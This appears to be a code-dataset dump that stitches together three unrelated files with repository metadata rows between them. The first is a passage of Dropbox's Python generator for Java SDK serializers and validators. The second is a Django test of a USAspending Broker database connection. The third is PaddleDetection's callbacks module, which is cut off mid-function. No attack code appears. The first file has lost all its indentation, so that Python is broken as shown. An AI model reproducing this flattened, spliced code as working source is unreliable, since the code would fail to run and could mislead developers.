parent_class = JavaClass('com.dropbox.core.v2.DbxDownloadStyleBuilder',
generics=(result_class,))
return_class = j.route_downloader_class(route)
elif j.has_result(route):
parent_class = None
return_class = j.java_class(route.result_data_type)
else:
parent_class = None
return_class = JavaClass('void')
w.importer.add_imports_for_route_builder(route)
w.write_imports()
w.out('')
w.javadoc(
"""
The request builder returned by %s.
Use this class to set optional request parameters and complete the request.
""" % w.javadoc_ref(route, builder=True)
)
with w.class_block(j.builder_class(route), parent_class=parent_class):
w.out('private final %s _client;', j.java_class(route))
if j.has_builder(arg):
w.out('private final %s _builder;', j.builder_class(arg))
else:
for f in arg.all_required_fields:
w.out('private final %s %s;', j.java_class(f), j.param_name(f))
for f in arg.all_optional_fields:
w.out('private %s %s;', j.java_class(f), j.param_name(f))
#
# CONSTRUCTOR
#
params = [
('_client',
'Dropbox namespace-specific client used to issue %s requests.' % j.route_namespace(route).name)
]
if j.has_builder(arg):
fields = ()
args = w.fmt('%s _client, %s _builder', j.java_class(route), j.builder_class(arg))
params.append(('_builder', 'Request argument builder.'))
else:
fields = arg.all_required_fields
args = w.fmt('%s _client, %s',
j.java_class(route),
', '.join(
w.fmt('%s %s', j.java_class(f), j.param_name(f)) for f in fields
))
w.out('')
w.javadoc(
'Creates a new instance of this builder.',
params=params,
fields=fields,
                returns='instance of this builder',
)
# package private
with w.block('%s(%s)', j.builder_class(route), args):
with w.block('if (_client == null)'):
w.out('throw new NullPointerException("_client");')
w.out('this._client = _client;')
if j.has_builder(arg):
with w.block('if (_builder == null)'):
w.out('throw new NullPointerException("_builder");')
w.out('this._builder = _builder;')
else:
for field in fields:
w.out('this.%s = %s;', j.param_name(field), j.param_name(field))
for field in arg.all_optional_fields:
if field.has_default:
w.out('this.%s = %s;', j.param_name(field), w.java_default_value(field))
else:
w.out('this.%s = null;', j.param_name(field))
#
# SETTERS/ADDERs for optional/list fields
#
wrapped_builder_name = '_builder' if j.has_builder(arg) else None
self.generate_builder_methods(j.builder_class(route), arg.all_fields,
wrapped_builder_name=wrapped_builder_name)
#
# BUILD method to start request
#
w.out('')
if j.request_style(route) in ('download', 'upload'):
w.out('@Override')
                # inherit doc from parent
else:
w.javadoc('Issues the request.')
if route.deprecated is not None:
w.out('@SuppressWarnings("deprecation")')
with w.block('public %s start() throws %s, DbxException',
return_class, exception_class):
if j.has_builder(arg):
w.out('%s arg_ = this._builder.build();', j.java_class(arg))
else:
w.out('%s arg_ = new %s(%s);',
j.java_class(arg),
j.java_class(arg),
', '.join(j.param_name(f) for f in arg.all_fields))
args = ['arg_']
if j.request_style(route) == 'download':
args.append('getHeaders()')
if j.has_result(route) or j.request_style(route) in ('upload', 'download'):
w.out('return _client.%s(%s);', j.route_method(route), ', '.join(args))
else:
w.out('_client.%s(%s);', j.route_method(route), ', '.join(args))
def generate_field_assignment(self, field, lhs=None, rhs=None, allow_default=True):
assert isinstance(field, Field), repr(field)
w = self.w
j = self.j
lhs = lhs or ('this.%s' % j.param_name(field))
rhs = rhs or j.param_name(field)
underlying_data_type = get_underlying_type(field.data_type)
# our timestamp format only allows for second-level granularity (no millis).
# enforce this.
#
# TODO: gotta be a better way than this...
if is_timestamp_type(underlying_data_type) and rhs != 'null':
rhs = w.fmt('%s.truncateMillis(%s)', JavaClass('com.dropbox.core.util.LangUtil'), rhs)
if allow_default and field.has_default:
java_default_value = w.java_default_value(field)
if rhs == 'null':
w.out('%s = %s;', lhs, java_default_value)
else:
with w.block('if (%s != null)', rhs):
w.out('%s = %s;', lhs, rhs)
with w.block('else'):
# set default
w.out('%s = %s;', lhs, java_default_value)
else:
w.out('%s = %s;', lhs, rhs)
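    # For reference, a sketch of the assignments emitted above (field names
    # are hypothetical). Timestamps are truncated to second granularity, and
    # the default branch only appears when allow_default is set and the field
    # declares a default in the spec:
    #
    #     this.created = LangUtil.truncateMillis(created);
    #
    #     if (limit != null) {
    #         this.limit = limit;
    #     }
    #     else {
    #         this.limit = 100L;
    #     }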
def generate_field_validation(self, field, value_name=None, omit_arg_name=False, allow_default=True):
"""Generate validation code for one field.
"""
assert isinstance(field, Field), repr(field)
w = self.w
j = self.j
data_type = field.data_type
value_name = value_name or j.param_name(field)
if is_void_type(field.data_type):
return
elif is_nullable_type(field.data_type):
data_type = data_type.data_type
if j.requires_validation(data_type):
with w.block('if (%s != null)', j.param_name(field)):
self.generate_data_type_validation(data_type, value_name, omit_arg_name=omit_arg_name)
else:
# Don't need to check primitive/default types for null.
if not (j.is_java_primitive(field.data_type) or (allow_default and field.has_default)):
with w.block('if (%s == null)' % value_name):
if omit_arg_name:
w.out('throw new IllegalArgumentException("Value is null");')
else:
w.out('throw new IllegalArgumentException("Required value for \'%s\' is null");', value_name)
self.generate_data_type_validation(data_type, value_name, omit_arg_name=omit_arg_name)
# T95586: Because Android has a bug that forces all classes with RUNTIME annotations into the
# primary dex, we cannot use annotation-based serialization. If we do, then every POJO will be
# added to a multidex app's primary dex, potentially exceeding the method count limit.
#
# The solution is to generate the serialization code for every POJO. Note that from a
# performance and maintenance standpoint, this is not ideal.
#
# The dalvik bug is tracked here: https://code.google.com/p/android/issues/detail?id=78144
def generate_struct_serializer(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
assert is_struct_type(data_type), repr(data_type)
w = self.w
j = self.j
visibility = j.serializer_visibility(data_type)
parent_class = JavaClass('com.dropbox.core.stone.StructSerializer',
generics=[j.java_class(data_type)])
w.out('')
w.javadoc("For internal use only.")
with w.class_block(j.serializer_class(data_type), visibility=visibility, parent_class=parent_class):
w.out('public static final %s INSTANCE = new %s();',
j.serializer_class(data_type),
j.serializer_class(data_type))
self.generate_struct_serialize(data_type)
self.generate_struct_deserialize(data_type)
def generate_union_serializer(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
assert is_union_type(data_type), repr(data_type)
w = self.w
j = self.j
visibility = j.serializer_visibility(data_type)
parent_class = JavaClass('com.dropbox.core.stone.UnionSerializer',
generics=[j.java_class(data_type)])
w.out('')
w.javadoc("For internal use only.")
with w.class_block(j.serializer_class(data_type), visibility=visibility, parent_class=parent_class):
w.out('public static final %s INSTANCE = new %s();',
j.serializer_class(data_type),
j.serializer_class(data_type))
self.generate_union_serialize(data_type)
self.generate_union_deserialize(data_type)
def generate_struct_serialize(self, data_type):
assert is_struct_type(data_type), repr(data_type)
w = self.w
j = self.j
w.out('')
w.out('@Override')
with w.block(
'public void serialize(%s value, JsonGenerator g, boolean collapse) throws IOException, JsonGenerationException',
j.java_class(data_type)):
if data_type.has_enumerated_subtypes():
for subtype in data_type.get_enumerated_subtypes():
subtype_serializer = w.java_serializer(subtype.data_type)
with w.block('if (value instanceof %s)', j.java_class(subtype)):
w.out('%s.serialize((%s) value, g, collapse);',
subtype_serializer,
j.java_class(subtype))
w.out('return;')
with w.block('if (!collapse)'):
w.out('g.writeStartObject();')
ancestors = get_ancestors(data_type)
tag = '.'.join(name for name, _ in ancestors[1:] if name)
if tag:
w.out('writeTag("%s", g);' % tag)
for field in data_type.all_fields:
field_serializer = w.java_serializer(field.data_type)
field_value = 'value.%s' % j.param_name(field)
with w.conditional_block(is_nullable_type(field.data_type), 'if (%s != null)', field_value):
w.out('g.writeFieldName("%s");', field.name)
w.out('%s.serialize(%s, g);', field_serializer, field_value)
with w.block('if (!collapse)'):
w.out('g.writeEndObject();')
def generate_struct_deserialize(self, data_type):
assert is_struct_type(data_type), repr(data_type)
w = self.w
j = self.j
w.out('')
w.out('@Override')
with w.block('public %s deserialize(JsonParser p, boolean collapsed) throws IOException, JsonParseException',
j.java_class(data_type)):
w.out('%s value;', j.java_class(data_type))
w.out('String tag = null;')
with w.block('if (!collapsed)'):
w.out('expectStartObject(p);')
w.out('tag = readTag(p);')
if data_type.is_member_of_enumerated_subtypes_tree():
ancestors = get_ancestors(data_type)
expected_tag = '.'.join(name for name, _ in ancestors if name)
with w.block('if ("%s".equals(tag))' % expected_tag):
w.out('tag = null;')
with w.block('if (tag == null)'):
for field in data_type.all_fields:
default_value = w.java_default_value(field) if field.has_default else 'null'
w.out('%s f_%s = %s;',
j.java_class(field, boxed=True), j.param_name(field), default_value)
if data_type.all_fields:
with w.block('while (p.getCurrentToken() == JsonToken.FIELD_NAME)'):
w.out('String field = p.getCurrentName();')
w.out('p.nextToken();')
for i, field in enumerate(data_type.all_fields):
conditional = 'if' if i == 0 else 'else if'
serializer = w.java_serializer(field.data_type)
with w.block('%s ("%s".equals(field))', conditional, field.name):
w.out('f_%s = %s.deserialize(p);', j.param_name(field), serializer)
with w.block('else'):
w.out('skipValue(p);')
for field in data_type.all_fields:
if field not in data_type.all_optional_fields:
with w.block('if (f_%s == null)', j.param_name(field)):
w.out('throw new JsonParseException(p, "Required field \\"%s\\" missing.");', field.name)
args = ['f_%s' % j.param_name(f) for f in data_type.all_fields]
w.out('value = new %s(%s);', j.java_class(data_type), ', '.join(args))
for tag, subtype_dt in get_enumerated_subtypes_recursively(data_type):
with w.block('else if ("%s".equals(tag))', tag):
w.out('value = %s.deserialize(p, true);', w.java_serializer(subtype_dt))
with w.block('else'):
w.out('throw new JsonParseException(p, "No subtype found that matches tag: \\"" + tag + "\\"");')
with w.block('if (!collapsed)'):
w.out('expectEndObject(p);')
w.out('StoneDeserializerLogger.log(value, value.toStringMultiline());')
w.out('return value;')
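    # A sketch of the JSON shapes this deserializer accepts (names are
    # illustrative): plain structs arrive as a flat object, while members of
    # an enumerated-subtypes tree carry a ".tag" naming the subtype:
    #
    #     {"name": "report.pdf", "size": 1024}
    #     {".tag": "file", "name": "report.pdf", "size": 1024}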
def generate_union_serialize(self, data_type):
assert is_union_type(data_type), repr(data_type)
w = self.w
j = self.j
w.out('')
w.out('@Override')
with w.block('public void serialize(%s value, JsonGenerator g) throws IOException, JsonGenerationException',
j.java_class(data_type)):
tag = 'value' if j.is_enum(data_type) else 'value.tag()'
with w.block('switch (%s)' % tag):
for field in data_type.all_fields:
if field == data_type.catch_all_field:
continue
with w.block('case %s:', j.field_tag_enum_name(field)):
if is_void_type(field.data_type):
w.out('g.writeString("%s");', field.name)
else:
w.out('g.writeStartObject();')
w.out('writeTag("%s", g);', field.name)
serializer = w.java_serializer(field.data_type)
value = 'value.%s' % j.param_name(field)
if j.is_collapsible(field.data_type) or is_nullable_type(
field.data_type) and j.is_collapsible(field.data_type.data_type):
w.out('%s.serialize(%s, g, true);', serializer, value)
else:
w.out('g.writeFieldName("%s");', field.name)
w.out('%s.serialize(%s, g);', serializer, value)
w.out('g.writeEndObject();')
w.out('break;')
with w.block('default:'):
if data_type.catch_all_field:
w.out('g.writeString("%s");', data_type.catch_all_field.name)
else:
w.out('throw new IllegalArgumentException("Unrecognized tag: " + %s);', tag)
def generate_union_deserialize(self, data_type):
assert is_union_type(data_type), repr(data_type)
w = self.w
j = self.j
w.out('')
w.out('@Override')
with w.block('public %s deserialize(JsonParser p) throws IOException, JsonParseException',
j.java_class(data_type)):
w.out('%s value;', j.java_class(data_type))
w.out('boolean collapsed;')
w.out('String tag;')
with w.block('if (p.getCurrentToken() == JsonToken.VALUE_STRING)'):
w.out('collapsed = true;')
w.out('tag = getStringValue(p);')
w.out('p.nextToken();')
with w.block('else'):
w.out('collapsed = false;')
w.out('expectStartObject(p);')
w.out('tag = readTag(p);')
with w.block('if (tag == null)'):
w.out('throw new JsonParseException(p, "Required field missing: " + TAG_FIELD);')
for field in data_type.all_fields:
if field == data_type.catch_all_field:
continue
field_dt = field.data_type
with w.block('else if ("%s".equals(tag))', field.name):
if is_void_type(field.data_type):
w.out('value = %s.%s;', j.java_class(data_type), j.field_static_instance(field))
else:
w.out('%s fieldValue = null;', j.java_class(field_dt, boxed=True, generics=True))
with w.conditional_block(is_nullable_type(field.data_type),
'if (p.getCurrentToken() != JsonToken.END_OBJECT)'):
field_serializer = w.java_serializer(field_dt)
if j.is_collapsible(field_dt) or is_nullable_type(field_dt) and j.is_collapsible(
field_dt.data_type):
w.out('fieldValue = %s.deserialize(p, true);', field_serializer)
else:
w.out('expectField("%s", p);', field.name)
w.out('fieldValue = %s.deserialize(p);', field_serializer)
if is_nullable_type(field.data_type):
with w.block('if (fieldValue == null)'):
w.out('value = %s.%s();', j.java_class(data_type), j.field_factory_method(field))
with w.block('else'):
w.out('value = %s.%s(fieldValue);', j.java_class(data_type),
j.field_factory_method(field))
else:
w.out('value = %s.%s(fieldValue);', j.java_class(data_type), j.field_factory_method(field))
with w.block('else'):
if data_type.catch_all_field:
w.out('value = %s.%s;', j.java_class(data_type), j.field_static_instance(data_type.catch_all_field))
else:
w.out('throw new JsonParseException(p, "Unknown tag: " + tag);')
with w.block('if (!collapsed)'):
w.out('skipFields(p);')
w.out('expectEndObject(p);')
w.out('return value;')
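    # A sketch of the two encodings handled above for a union value (tag and
    # field names are illustrative): a bare string for void variants, or an
    # object whose ".tag" selects the variant:
    #
    #     "default_public"
    #     {".tag": "member", "member": {"email": "..."}}
    #
    # Unknown tags map to the catch-all instance when the union declares one;
    # otherwise a JsonParseException is thrown.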
def generate_data_type_validation(self, data_type, value_name, description=None, omit_arg_name=False, level=0):
assert isinstance(data_type, DataType), repr(data_type)
w = self.w
j = self.j
if omit_arg_name:
description = ""
else:
description = description or (" '%s'" % value_name)
if is_list_type(data_type):
if data_type.min_items is not None:
java_value = w.java_value(Int32(), data_type.min_items)
with w.block('if (%s.size() < %s)', value_name, java_value):
w.out('throw new IllegalArgumentException("List%s has fewer than %s items");',
description, java_value)
if data_type.max_items is not None:
java_value = w.java_value(Int32(), data_type.max_items)
with w.block('if (%s.size() > %s)', value_name, java_value):
w.out('throw new IllegalArgumentException("List%s has more than %s items");',
description, java_value)
xn = 'x' if level == 0 else 'x%d' % level
list_item_type = j.java_class(data_type.data_type, boxed=True, generics=True)
with w.block('for (%s %s : %s)', list_item_type, xn, value_name):
with w.block('if (%s == null)', xn):
w.out('throw new IllegalArgumentException("An item in list%s is null");', description)
self.generate_data_type_validation(data_type.data_type, xn, 'an item in list%s' % description,
level=level + 1)
elif is_map_type(data_type):
xn = 'x' if level == 0 else 'x%d' % level
map_item_type = j.java_class(data_type.value_data_type, boxed=True, generics=True)
with w.block('for (%s %s : %s.values())', map_item_type, xn, value_name):
with w.block('if (%s == null)', xn):
w.out('throw new IllegalArgumentException("An item in map%s is null");', description)
self.generate_data_type_validation(data_type.value_data_type, xn, 'an item in map%s' % description,
level=level + 1)
elif is_numeric_type(data_type):
if data_type.min_value is not None:
java_value = w.java_value(data_type, data_type.min_value)
with w.block('if (%s < %s)', value_name, java_value):
w.out('throw new IllegalArgumentException("Number%s is smaller than %s");',
description, java_value)
if data_type.max_value is not None:
java_value = w.java_value(data_type, data_type.max_value)
with w.block('if (%s > %s)', value_name, java_value):
w.out('throw new IllegalArgumentException("Number%s is larger than %s");',
description, java_value)
elif is_string_type(data_type):
if data_type.min_length is not None:
java_value = w.java_value(Int32(), data_type.min_length)
with w.block('if (%s.length() < %s)', value_name, java_value):
w.out('throw new IllegalArgumentException("String%s is shorter than %s");',
description, java_value)
if data_type.max_length is not None:
java_value = w.java_value(Int32(), data_type.max_length)
with w.block('if (%s.length() > %s)', value_name, java_value):
w.out('throw new IllegalArgumentException("String%s is longer than %s");',
description, java_value)
if data_type.pattern is not None:
# TODO: Save the pattern as a static variable.
# NOTE: pattern should match against entire input sequence
pattern_class = JavaClass("java.util.regex.Pattern")
pattern = sanitize_pattern(data_type.pattern)
with w.block('if (!%s.matches("%s", %s))', pattern_class, pattern, value_name):
w.out('throw new IllegalArgumentException("String%s does not match pattern");', description)
elif any((
is_composite_type(data_type),
is_boolean_type(data_type),
is_timestamp_type(data_type),
is_bytes_type(data_type),
)):
pass # Nothing to do for these
else:
raise AssertionError(repr(data_type))
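    # A sketch of the Java emitted for a hypothetical String field `name`
    # with min_length=1 and a pattern (constraint values are illustrative):
    #
    #     if (name.length() < 1) {
    #         throw new IllegalArgumentException("String 'name' is shorter than 1");
    #     }
    #     if (!java.util.regex.Pattern.matches("[A-Za-z0-9_-]+", name)) {
    #         throw new IllegalArgumentException("String 'name' does not match pattern");
    #     }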
def generate_to_string(self, data_type):
assert is_user_defined_type(data_type), repr(data_type)
w = self.w
w.out('')
w.out('@Override')
with w.block('public String toString()'):
w.out('return Serializer.INSTANCE.serialize(this, false);')
w.out('')
w.javadoc(
"""
Returns a String representation of this object formatted for easier readability.
The returned String may contain newlines.
""",
returns="Formatted, multiline String representation of this object"
)
with w.block('public String toStringMultiline()'):
w.out('return Serializer.INSTANCE.serialize(this, true);')
def generate_hash_code(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
assert is_user_defined_type(data_type), repr(data_type)
w = self.w
j = self.j
        assert not j.is_enum(data_type), "enum types don't require hashCode() methods"
if is_struct_type(data_type):
fields = [j.param_name(f) for f in data_type.fields]
else:
fields = ['_tag'] + [j.param_name(f) for f in data_type.all_fields if j.has_value(f)]
w.out('')
w.out('@Override')
with w.block('public int hashCode()'):
if not fields:
w.out('// attempt to deal with inheritance')
w.out('return getClass().toString().hashCode();')
else:
arrays_class = JavaClass('java.util.Arrays')
with w.block('int hash = %s.hashCode(new Object []', arrays_class, after=');'):
self.g.generate_multiline_list(fields, delim=('', ''))
if data_type.parent_type:
w.out('hash = (31 * super.hashCode()) + hash;')
w.out('return hash;')
def _java_eq(self, field, name=None):
assert isinstance(field, Field), repr(field)
j = self.j
name = name or j.param_name(field)
if j.is_java_primitive(field.data_type):
return 'this.%(f)s == other.%(f)s' % dict(f=name)
elif not is_nullable_type(field.data_type):
return '(this.%(f)s == other.%(f)s) || (this.%(f)s.equals(other.%(f)s))' % dict(f=name)
else:
return '(this.%(f)s == other.%(f)s) || (this.%(f)s != null && this.%(f)s.equals(other.%(f)s))' % dict(
f=name)
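    # The three comparison shapes produced above, for a hypothetical field f:
    #
    #     this.f == other.f                                                   // primitive
    #     (this.f == other.f) || (this.f.equals(other.f))                     // required reference
    #     (this.f == other.f) || (this.f != null && this.f.equals(other.f))   // nullable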
def generate_equals(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
assert is_user_defined_type(data_type), repr(data_type)
if is_struct_type(data_type):
self.generate_struct_equals(data_type)
else:
self.generate_union_equals(data_type)
def generate_union_equals(self, data_type):
assert is_union_type(data_type), repr(data_type)
w = self.w
j = self.j
assert not j.is_enum(data_type), "enum types don't require equals() methods"
w.out('')
w.out('@Override')
with w.block('public boolean equals(Object obj)'):
with w.block('if (obj == this)'):
w.out('return true;')
with w.block('if (obj == null)'):
w.out('return false;')
with w.block('else if (obj instanceof %s)', j.java_class(data_type)):
w.out('%s other = (%s) obj;', j.java_class(data_type), j.java_class(data_type))
with w.block('if (this._tag != other._tag)'):
w.out('return false;')
with w.block('switch (_tag)'):
for field in data_type.all_fields:
w.out('case %s:', j.field_tag_enum_name(field))
with self.g.indent():
if j.has_value(field):
w.out('return %s;', self._java_eq(field))
else:
w.out('return true;')
w.out('default:')
with self.g.indent():
w.out('return false;')
with w.block('else'):
w.out('return false;')
def generate_struct_equals(self, data_type):
assert is_struct_type(data_type), repr(data_type)
w = self.w
j = self.j
w.out('')
w.out('@Override')
with w.block('public boolean equals(Object obj)'):
with w.block('if (obj == this)'):
w.out('return true;')
with w.block('if (obj == null)'):
w.out('return false;')
w.out('// be careful with inheritance')
with w.block('else if (obj.getClass().equals(this.getClass()))'):
w.out('%s other = (%s) obj;', j.java_class(data_type), j.java_class(data_type))
if not data_type.all_fields:
w.out('return true;')
elif len(data_type.all_fields) == 1:
w.out('return %s;', self._java_eq(data_type.all_fields[0]))
else:
w.out('return (%s)', self._java_eq(data_type.all_fields[0]))
with self.g.indent():
for field in data_type.all_fields[1:]:
w.out('&& (%s)', self._java_eq(field))
w.out(';')
with w.block('else'):
w.out('return false;')
# TODO: Add all Java reserved words.
_RESERVED_KEYWORDS = {
'Enum',
'Iterable',
'Object',
'abstract',
'assert',
'boolean',
'break',
'byte',
'case',
'catch',
'char',
'class',
'const',
'continue',
'default',
'do',
'double',
'else',
'enum',
'extends',
'false',
'final',
'finally',
'float',
'for',
'goto',
'if',
'int',
'interface',
'long',
'native',
'new',
'null',
'package',
'private',
'protected',
'public',
'return',
'short',
'static',
'strictfp',
'super',
'switch',
'synchronized',
'this',
'throw',
'throws',
'transient',
'true',
'try',
'void',
'volatile',
'while',
}
_TYPE_MAP_UNBOXED = {
'UInt64': 'long',
'Int64': 'long',
'UInt32': 'long',
'Int32': 'int',
'Float64': 'double',
'Float32': 'float',
'Boolean': 'boolean',
'Bytes': 'byte[]',
'String': 'String',
'Timestamp': 'java.util.Date',
'Void': 'void',
'List': 'java.util.List',
'Map': 'java.util.Map',
}
_TYPE_MAP_BOXED = {
'UInt64': 'Long',
'Int64': 'Long',
'UInt32': 'Long',
'Int32': 'Integer',
'Float64': 'Double',
'Float32': 'Float',
'Boolean': 'Boolean',
'Bytes': 'byte[]',
'String': 'String',
'Timestamp': 'java.util.Date',
'Void': 'Void',
'List': 'java.util.List',
'Map': 'java.util.Map',
}
_CATCH_ALL_DOC = """
Catch-all used for unknown tag values returned by the Dropbox servers.
Receiving a catch-all value typically indicates this SDK version is not up to
date. Consider updating your SDK version to handle the new tags.
"""
|
09a7c689129cc95b73bb5421a131c5110374d9df
|
c530897cb72b6943c7226b25824444cad5f3503b
|
/usaspending_api/broker/tests/integration/test_broker_integration.py
|
79490760e4f77ec4c4049262881c1b9492d586e3
|
[
"CC0-1.0"
] |
permissive
|
fedspendingtransparency/usaspending-api
|
fc63a22d32ea0207b7273d3e1ef26ba9dbabc42a
|
38f920438697930ae3ac57bbcaae9034877d8fb7
|
refs/heads/master
| 2023-09-01T22:00:36.633612
| 2023-08-29T18:39:18
| 2023-08-29T18:39:18
| 65,394,827
| 276
| 118
|
CC0-1.0
| 2023-09-14T20:33:15
| 2016-08-10T15:39:45
|
Python
|
UTF-8
|
Python
| false
| false
| 4,595
|
py
|
test_broker_integration.py
|
import pytest
from django.conf import settings
from django.db import connections, DEFAULT_DB_ALIAS
from django.test import TestCase
class BrokerIntegrationTestCase(TestCase):
databases = {"default", "data_broker"}
dummy_table_name = "dummy_broker_table_to_be_rolled_back"
@classmethod
def setUpClass(cls):
pass
@classmethod
def tearDownClass(cls):
# Follow-up of test_broker_transactional_test
with connections["data_broker"].cursor() as cursor:
cursor.execute("select * from pg_tables where tablename = '{}'".format(cls.dummy_table_name))
results = cursor.fetchall()
assert results is not None
if len(results) != 0:
pytest.fail(
"Test test_broker_transactional_test did not run transactionally. "
"Creation of table {} in Broker DB was not rolled back and still exists.".format(cls.dummy_table_name)
)
@pytest.mark.usefixtures("broker_db_setup")
def test_can_connect_to_broker(self):
"""Simple 'integration test' that checks a Broker DB exists to integrate with"""
connection = connections["data_broker"]
with connection.cursor() as cursor:
cursor.execute("SELECT now()")
results = cursor.fetchall()
assert results is not None
assert len(str(results[0][0])) > 0
@pytest.mark.usefixtures("broker_db_setup")
def test_broker_transactional_test(self):
"""Integration test that checks whether Django's default transactional test implementation works against the
integrated Broker DB too.
        The test creates a dummy table during its execution. If the transactional wrapper is working, that table
        creation will be rolled back after the test completes. This is not verified until the ``tearDownClass``
        method runs.
NOTE: The transaction is only controlled and will only roll-back if you use Django's django.db.connections
dictionary to get the connection.
"""
dummy_contents = "dummy_text"
# Make sure the table and the data get in there
connection = connections["data_broker"]
with connection.cursor() as cursor:
cursor.execute("create table {} (contents text)".format(self.dummy_table_name))
cursor.execute("insert into {} values ('{}')".format(self.dummy_table_name, dummy_contents))
with connection.cursor() as cursor:
cursor.execute("select * from pg_tables where tablename = '{}'".format(self.dummy_table_name))
results = cursor.fetchall()
assert results is not None
assert len(str(results[0][0])) > 0
with connection.cursor() as cursor:
cursor.execute("select * from {}".format(self.dummy_table_name))
results = cursor.fetchall()
assert results is not None
assert str(results[0][0]) == dummy_contents
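    # For contrast, a minimal sketch (assuming psycopg2 and a hypothetical
    # broker_dsn, neither part of this test suite) of a connection opened
    # outside Django's connections dict; it would NOT join the test
    # transaction, so its DDL would persist:
    #
    #     import psycopg2
    #     conn = psycopg2.connect(broker_dsn)
    #     conn.cursor().execute("create table not_rolled_back (contents text)")
    #     conn.commit()  # survives the test; would need manual cleanup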
@pytest.mark.usefixtures("broker_db_setup")
def test_broker_db_fully_setup(self):
"""Simple 'integration test' that checks a Broker DB had its schema setup"""
connection = connections["data_broker"]
with connection.cursor() as cursor:
cursor.execute("select * from pg_tables where tablename = 'alembic_version'")
results = cursor.fetchall()
assert results is not None
assert len(results) > 0
assert len(str(results[0][0])) > 0
def test_can_connect_to_broker_by_dblink(broker_server_dblink_setup, db):
"""Simple 'integration test' that checks the USAspending to Broker dblink works
It will be skipped if a broker foreign data wrapper is not created in the USAspending database-under-test
"""
connection = connections[DEFAULT_DB_ALIAS]
with connection.cursor() as cursor:
cursor.execute(f"select srvname from pg_foreign_server where srvname = '{settings.DATA_BROKER_DBLINK_NAME}'")
results = cursor.fetchall()
if not results or not results[0][0] == settings.DATA_BROKER_DBLINK_NAME:
pytest.skip(
f"No foreign server named '{settings.DATA_BROKER_DBLINK_NAME}' has been setup on this "
"USAspending database. Skipping the test of integration with that server via dblink"
)
cursor.execute(
f"SELECT * FROM dblink('{settings.DATA_BROKER_DBLINK_NAME}','SELECT now()') "
"AS broker_time(the_now timestamp)"
)
results = cursor.fetchall()
assert results is not None
assert len(results) > 0
assert len(str(results[0][0])) > 0
|
803ba38f89a1ed0ee99381cd809d49bfaaf8135b
|
bf8d344b17e2ff9b7e38ad9597d5ce0e3d4da062
|
/ppdet/engine/callbacks.py
|
1f2d546d86e9473c5dd6b7fd15068c940006dab5
|
[
"Apache-2.0"
] |
permissive
|
PaddlePaddle/PaddleDetection
|
e7e0f40bef75a4e0b6dcbacfafa7eb1969e44961
|
bd83b98342b0a6bc8d8dcd5936233aeda1e32167
|
refs/heads/release/2.6
| 2023-08-31T07:04:15.357051
| 2023-08-18T02:24:45
| 2023-08-18T02:24:45
| 217,475,193
| 12,523
| 3,096
|
Apache-2.0
| 2023-09-10T10:05:56
| 2019-10-25T07:21:14
|
Python
|
UTF-8
|
Python
| false
| false
| 21,592
|
py
|
callbacks.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import datetime
import six
import copy
import json
import paddle
import paddle.distributed as dist
from ppdet.utils.checkpoint import save_model
from ppdet.metrics import get_infer_results
from ppdet.utils.logger import setup_logger
logger = setup_logger('ppdet.engine')
__all__ = [
'Callback', 'ComposeCallback', 'LogPrinter', 'Checkpointer',
'VisualDLWriter', 'SniperProposalsGenerator'
]
class Callback(object):
def __init__(self, model):
self.model = model
def on_step_begin(self, status):
pass
def on_step_end(self, status):
pass
def on_epoch_begin(self, status):
pass
def on_epoch_end(self, status):
pass
def on_train_begin(self, status):
pass
def on_train_end(self, status):
pass
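# A minimal sketch of a custom callback (hypothetical): subclass Callback and
# override only the hooks you need; every hook receives the shared `status`
# dict maintained by the trainer.
#
#     class StepCounter(Callback):
#         def __init__(self, model):
#             super(StepCounter, self).__init__(model)
#             self.steps = 0
#
#         def on_step_end(self, status):
#             self.steps += 1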
class ComposeCallback(object):
def __init__(self, callbacks):
callbacks = [c for c in list(callbacks) if c is not None]
for c in callbacks:
            assert isinstance(
                c, Callback), "callback should be a subclass of Callback"
self._callbacks = callbacks
def on_step_begin(self, status):
for c in self._callbacks:
c.on_step_begin(status)
def on_step_end(self, status):
for c in self._callbacks:
c.on_step_end(status)
def on_epoch_begin(self, status):
for c in self._callbacks:
c.on_epoch_begin(status)
def on_epoch_end(self, status):
for c in self._callbacks:
c.on_epoch_end(status)
def on_train_begin(self, status):
for c in self._callbacks:
c.on_train_begin(status)
def on_train_end(self, status):
for c in self._callbacks:
c.on_train_end(status)
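# Usage sketch (hypothetical `trainer`): the trainer builds one ComposeCallback
# and fires each hook on every registered callback in order; None entries are
# filtered out, so optional callbacks can be appended conditionally.
#
#     callbacks = ComposeCallback([LogPrinter(trainer), Checkpointer(trainer)])
#     callbacks.on_train_begin(status)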
class LogPrinter(Callback):
def __init__(self, model):
super(LogPrinter, self).__init__(model)
def on_step_end(self, status):
if dist.get_world_size() < 2 or dist.get_rank() == 0:
mode = status['mode']
if mode == 'train':
epoch_id = status['epoch_id']
step_id = status['step_id']
steps_per_epoch = status['steps_per_epoch']
                training_status = status['training_staus']  # NOTE: dict key spelling comes from the trainer
batch_time = status['batch_time']
data_time = status['data_time']
epoches = self.model.cfg.epoch
batch_size = self.model.cfg['{}Reader'.format(mode.capitalize(
))]['batch_size']
                logs = training_status.log()
space_fmt = ':' + str(len(str(steps_per_epoch))) + 'd'
if step_id % self.model.cfg.log_iter == 0:
eta_steps = (epoches - epoch_id) * steps_per_epoch - step_id
eta_sec = eta_steps * batch_time.global_avg
eta_str = str(datetime.timedelta(seconds=int(eta_sec)))
ips = float(batch_size) / batch_time.avg
fmt = ' '.join([
'Epoch: [{}]',
'[{' + space_fmt + '}/{}]',
'learning_rate: {lr:.6f}',
'{meters}',
'eta: {eta}',
'batch_cost: {btime}',
'data_cost: {dtime}',
'ips: {ips:.4f} images/s',
])
fmt = fmt.format(
epoch_id,
step_id,
steps_per_epoch,
lr=status['learning_rate'],
meters=logs,
eta=eta_str,
btime=str(batch_time),
dtime=str(data_time),
ips=ips)
logger.info(fmt)
if mode == 'eval':
